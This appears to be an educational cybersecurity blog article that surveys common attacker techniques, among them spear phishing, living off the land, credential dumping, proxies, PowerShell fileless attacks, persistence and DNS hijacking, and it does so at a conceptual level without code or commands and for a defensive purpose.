Cyberattacks are often painted as the sorcery of computer geniuses clad in dark hoodies sitting in a basement in front of their multi-monitor setup. However, more often than not, it is just the work of regular skilled individuals who focus their efforts on finding existing loopholes and exploiting it for financial gains and causing service disruption. Recently, a new breed of attackers has begun to take shape. An attacker who is assisted by nation-state actors to achieve certain strategic geopolitical objectives. Amidst the endless reporting of cyberattacks, it is important to take a moment and look at the fundamental elements of how these attacks work. After all, without understanding the adversary and their techniques, one cannot defend against them.
An attacker looking to target specific individuals or organizations can use many different attack techniques to do so. Depending on the unique attack surface of the target and the attackers’ motives, certain attack vectors may prove to be more effective. In this article, we give an overview of the seven most dangerous attack techniques used by modern threat actors.
Spear Phishing Attack
Spear phishing is a type of phishing attack using email or electronic communications directed towards a very specific target either an individual or an organization. The name itself is derived from the analogy of a spear hitting with pin-point accuracy its target. The motive behind this kind of attack can be financial gain, data theft, or even cyber espionage.
Most commonly, spear phishing attacks are leveraged to:
- Deliver malicious documents
- Deliver a malicious URL in the message body or in an attachment
- Collect inside information or ask for assistance
- Deliver a malicious piece of code or software
Spear phishing has been a core component of many major cyberattacks over the years. This technique has been used by attackers behind several major incidents. Moreover, payroll phishing scams and employee impersonation attacks in recent years also continue to leverage this technique.
Living Off the Land
In recent times, attackers have increasingly begun to exploit legitimate tools used by system administrators. Dubbed as “Living Off the Land,” this technique involves the repurposing of typically pre-installed or whitelisted system tools to conduct stealthy attacks. Due to the legitimate appearance of such tools, it becomes very difficult to detect this kind of attack. Besides, defenders also cannot completely block these kinds of tools as they are often an essential part of their workflow.
Most of the existing security solutions are also inept at detecting the malicious use of system tools. Thus, attackers can manage to hide in plain sight using this technique. It is also worth noting that its difficult to establish attack attribution since all attackers use similar techniques and tools.
A famous attack campaign leveraging this technique was that of the Petya/NotPetya ransomware attack in 2017. The Petya ransomware was injected through a software supply chain attack as the initial step wherein the attackers compromised the update process of a software accounting program widely used in Ukraine. This resulted in a large number of Petya/NotPetya infections in Ukraine.
Credential Dumping is a technique in which attackers try to obtain login credentials in plain text or as a hash, straight from the operating system or software. Using the credentials, attackers can then move laterally across the targeted network and access sensitive information.
Among the many variations of this technique, the most common implementations focus on collecting hashed credentials, plaintext credentials, or accessing secret key material.
Notorious threat actor groups such as the FIN7 and MuddyWater groups are known to use this technique in their attack campaigns.
One prevalent technique used by attackers for malicious purposes as well as to hide their tracks involves the use of proxies. A connection proxy is used to direct the flow of network traffic between various systems or act as an intermediary for network communications. Such a proxy network might be used within a single organization or across organizations based on trust relationships.
Threat actors can exploit proxies to monitor, access, manipulate, or remove specific information flowing through their target networks. They can also use it to hide their command and control communication or direct their traffic through less attributable access points.
Variations of this technique are also used to conduct Watering Hole attacks or attacks on key supply-chain entities such as Content Delivery Networks (CDNs).
Powershell is an interactive command-line interface and scripting environment included by default in the Windows operating system. It can be used to invoke local processes, access system information, execute malicious code, or even download and run malicious executables from the internet.
Attackers can use it to pass encoded payloads via the command line or access and execute remote malicious resources. Due to the diverse capabilities of Powershell, it is used in many different kinds of attacks. The often-quoted rise of fileless malware attacks in recent times is based on the use of Powershell exploits.
Around the year 2016, many state-sponsored threat actors began using Powershell to craft fileless malware attacks that run straight in the memory and leave no traces in the disk. The use of Powershell scripts has been on the rise ever since. Turla, a cyberespionage group believed to be from Russia, was found targeting EU diplomats in recent attacks in May 2019. The group used weaponized PowerShell scripts to enable direct, in-memory loading and execution of malware executables and libraries. Powershell continues to be a tool of choice for attackers to implement fileless malware, download malicious payloads, or move laterally across their target network.
One of the common tactics of attackers is to maintain their presence and/or control the target system without being detected for as long as possible. Maintaining persistence is especially vital for attackers who need an extended period of time to spread information-stealing trojans and/or multiple backdoors to prevent any interruption in access to the target systems.
To achieve persistence, attackers can employ different techniques such as:
- Adding entries to the ‘run keys’ in Windows Registry
- Adding malicious executables or scripts as default startup processes
Domain Name System (DNS) Hijacking is yet another attack technique that allows attackers to cause large scale damage to an organization or group of users. In this technique, attackers manipulate the domain registration of an entity without the knowledge of its owners. This means that legitimate users trying to access the entity will then be redirected to whatever malicious resources that attackers choose.
Attackers can execute this by overriding the default DNS configuration of a target system or their local router to direct it towards their malicious DNS server. Another approach used by attackers is to hack trusted DNS servers and change the DNS records stored in it so as to redirect traffic on a large scale. Additionally, attackers can also manipulate the communication between a user and a trusted DNS server so as to point the user to malicious websites.
In the first half of 2019, several countries including the US, the UK, and others, sounded the warning bell on threat actors conducting DNS Hijacking on regular users as well as targeted organizations. It still remains a credible threat that can have a large impact on its targets.
The Bottom Line
The first step to preventing cyberattacks is to gain insights into how threat actors operate. Just having a black box understanding of cyber threats results in inefficient efforts and misguided investments for organizations. As attackers continue to advance their malicious operations with newer and more advanced techniques, defenders must stay abreast of the evolving threat landscape. Ultimately, a sound knowledge of adversary tactics, techniques, and procedures sets the base for a strong cyber defense for any organization.